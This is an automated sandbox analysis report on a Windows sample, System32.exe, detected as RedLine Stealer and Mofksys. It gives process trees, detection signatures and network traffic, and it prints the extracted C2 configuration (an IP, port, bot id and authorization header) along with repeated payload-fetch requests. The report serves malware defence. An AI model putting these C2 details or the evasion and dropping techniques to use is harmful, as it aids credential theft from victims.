Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
System32.exe

Overview

General Information

Sample name:System32.exe
Analysis ID:1575683
MD5:d4817ea043beaf35d19fa6a5adaa179c
SHA1:bf5c75100142731e737c04b55769c4479bef0c01
SHA256:da5844b02ebfa56b4c036ea50136e7766922fa1591d344130f5492e5624fdf5d
Tags:exeRedlineStealeruser-lontze7
Infos:

Detection

CryptOne, Mofksys, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Mofksys
Yara detected RedLine Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • System32.exe (PID: 1588 cmdline: "C:\Users\user\Desktop\System32.exe" MD5: D4817EA043BEAF35D19FA6A5ADAA179C)
    • system32.exe (PID: 7140 cmdline: c:\users\user\desktop\system32.exe MD5: C368CB0E4CC65CBDC012E449DE37D973)
    • icsys.icn.exe (PID: 2940 cmdline: C:\Windows\Resources\Themes\icsys.icn.exe MD5: 6A696257BD624EA0CDDE713FF447B134)
      • explorer.exe (PID: 3224 cmdline: c:\windows\resources\themes\explorer.exe MD5: 805C1BF19E32C7B484F3555C6A3BE527)
        • spoolsv.exe (PID: 2532 cmdline: c:\windows\resources\spoolsv.exe SE MD5: 08CFDA44CEE577DA294331E5F9615605)
          • svchost.exe (PID: 4232 cmdline: c:\windows\resources\svchost.exe MD5: A2D31781CBA01F1BCB14F06D4CF851BD)
            • spoolsv.exe (PID: 2444 cmdline: c:\windows\resources\spoolsv.exe PR MD5: 08CFDA44CEE577DA294331E5F9615605)
  • explorer.exe (PID: 6408 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 805C1BF19E32C7B484F3555C6A3BE527)
  • svchost.exe (PID: 6016 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • explorer.exe (PID: 1016 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 805C1BF19E32C7B484F3555C6A3BE527)
    • consent.exe (PID: 5932 cmdline: consent.exe 6016 322 0000022C4F0331F0 MD5: DD5032EF160209E470E2612A8A3D5F59)
    • svchost.exe (PID: 6804 cmdline: "C:\windows\resources\svchost.exe" RO MD5: A2D31781CBA01F1BCB14F06D4CF851BD)
  • svchost.exe (PID: 5732 cmdline: "C:\windows\resources\svchost.exe" RO MD5: A2D31781CBA01F1BCB14F06D4CF851BD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MofksysNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["159.223.34.114:1912"], "Bot Id": "duc", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
System32.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\system32.exe JoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.2484557190.0000000000401000.00000040.00000001.01000000.0000000B.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
        00000003.00000002.2372041584.0000000000401000.00000040.00000001.01000000.0000000A.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
          00000008.00000002.2372208986.0000000000401000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
            00000006.00000002.2370477599.0000000000401000.00000040.00000001.01000000.0000000C.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
              00000000.00000003.2142890719.0000000002C70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
                Click to see the 20 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.0.system32.exe .9c0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  6.2.spoolsv.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                    3.2.icsys.icn.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                      14.2.explorer.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                        0.2.System32.exe.400000.0.unpackJoeSecurity_MofksysYara detected MofksysJoe Security
                          Click to see the 3 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Resources\Themes\icsys.icn.exe, ProcessId: 2940, TargetFilename: c:\windows\resources\themes\explorer.exe
                          Sigma detected: Suspect Svchost Activity
                          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 2532, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 4232, ProcessName: svchost.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: C:\Windows\Resources\Themes\icsys.icn.exe, ParentImage: C:\Windows\Resources\Themes\icsys.icn.exe, ParentProcessId: 2940, ParentProcessName: icsys.icn.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 3224, ProcessName: explorer.exe
                          Sigma detected: Execution of Suspicious File Type Extension
                          Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: c:\users\user\desktop\system32.exe , CommandLine: c:\users\user\desktop\system32.exe , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\system32.exe , NewProcessName: C:\Users\user\Desktop\system32.exe , OriginalFileName: C:\Users\user\Desktop\system32.exe , ParentCommandLine: "C:\Users\user\Desktop\System32.exe", ParentImage: C:\Users\user\Desktop\System32.exe, ParentProcessId: 1588, ParentProcessName: System32.exe, ProcessCommandLine: c:\users\user\desktop\system32.exe , ProcessId: 7140, ProcessName: system32.exe
                          Sigma detected: Uncommon Svchost Parent Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 2532, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 4232, ProcessName: svchost.exe
                          Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\Themes\explorer.exe, ProcessId: 3224, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 2532, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 4232, ProcessName: svchost.exe

                          Suricata Signatures

                          No Suricata rule has matched

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: System32.exeAvira: detected
                          Antivirus detection for dropped file
                          Source: C:\Windows\Resources\spoolsv.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: C:\Windows\Resources\svchost.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Source: C:\Windows\Resources\Themes\explorer.exeAvira: detection malicious, Label: TR/Dropper.Gen
                          Found malware configuration
                          Source: System32.exeMalware Configuration Extractor: RedLine {"C2 url": ["159.223.34.114:1912"], "Bot Id": "duc", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                          Multi AV Scanner detection for domain / URL
                          Source: 159.223.34.114:1912Virustotal: Detection: 5%Perma Link
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\Desktop\system32.exe ReversingLabs: Detection: 86%
                          Source: C:\Users\user\Desktop\system32.exe Virustotal: Detection: 68%Perma Link
                          Multi AV Scanner detection for submitted file
                          Source: System32.exeVirustotal: Detection: 84%Perma Link
                          Source: System32.exeReversingLabs: Detection: 68%
                          Machine Learning detection for dropped file
                          Source: C:\Windows\Resources\spoolsv.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\system32.exe Joe Sandbox ML: detected
                          Source: C:\Windows\Resources\Themes\icsys.icn.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Resources\svchost.exeJoe Sandbox ML: detected
                          Source: C:\Windows\Resources\Themes\explorer.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: System32.exeJoe Sandbox ML: detected
                          Source: System32.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb{ source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb&Rt_ source: system32.exe , 00000002.00000002.3376294690.0000000001030000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbK source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb" source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001066000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000000FC1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: system32.exe , 00000002.00000002.3376294690.0000000001030000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: System.ServiceModel.pdb2( source: system32.exe , 00000002.00000002.3376294690.0000000001037000.00000004.00000020.00020000.00000000.sdmp

                          Spreading

                          barindex
                          Yara detected Mofksys
                          Source: Yara matchFile source: 6.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.icsys.icn.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 14.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.System32.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000E.00000002.2484557190.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2372041584.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.2372208986.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.2370477599.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2142890719.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000003.2566321903.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000003.2273075923.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000003.2343834578.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.2286896505.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000003.2298339937.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000003.2324309344.00000000012B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000003.2361376513.00000000011B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000E.00000003.2481892944.0000000002D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000002.3375931063.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2567275778.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: System32.exe PID: 1588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: icsys.icn.exe PID: 2940, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 2532, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4232, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 2444, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1016, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6804, type: MEMORYSTR

                          Networking

                          barindex
                          System process connects to network (likely due to code injection or exploit)
                          Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 173.194.221.82 80Jump to behavior
                          C2 URLs / IPs found in malware configuration
                          Source: Malware configuration extractorURLs: 159.223.34.114:1912
                          Source: global trafficTCP traffic: 192.168.2.6:49708 -> 159.223.34.114:1912
                          Source: Joe Sandbox ViewASN Name: CELANESE-US CELANESE-US
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
                          Source: unknownTCP traffic detected without corresponding DNS query: 159.223.34.114
